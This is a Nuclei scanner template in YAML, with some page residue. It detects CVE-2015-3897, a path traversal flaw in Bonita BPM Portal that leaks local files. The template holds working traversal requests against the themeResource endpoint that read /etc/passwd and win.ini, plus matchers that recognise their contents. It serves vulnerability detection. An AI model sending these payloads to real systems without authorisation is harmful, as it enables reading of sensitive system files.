42 lines
1.4 KiB
YAML
42 lines
1.4 KiB
YAML
id: CVE-2015-3897
|
|
|
|
info:
|
|
name: Bonita BPM Portal <6.5.3 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
|
|
- https://www.bonitasoft.com/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-3897
|
|
- https://www.htbridge.com/advisory/HTB23259
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-3897
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2015,bonita,lfi,unauth
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd"
|
|
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
# Enhanced by mp on 2022/06/08
|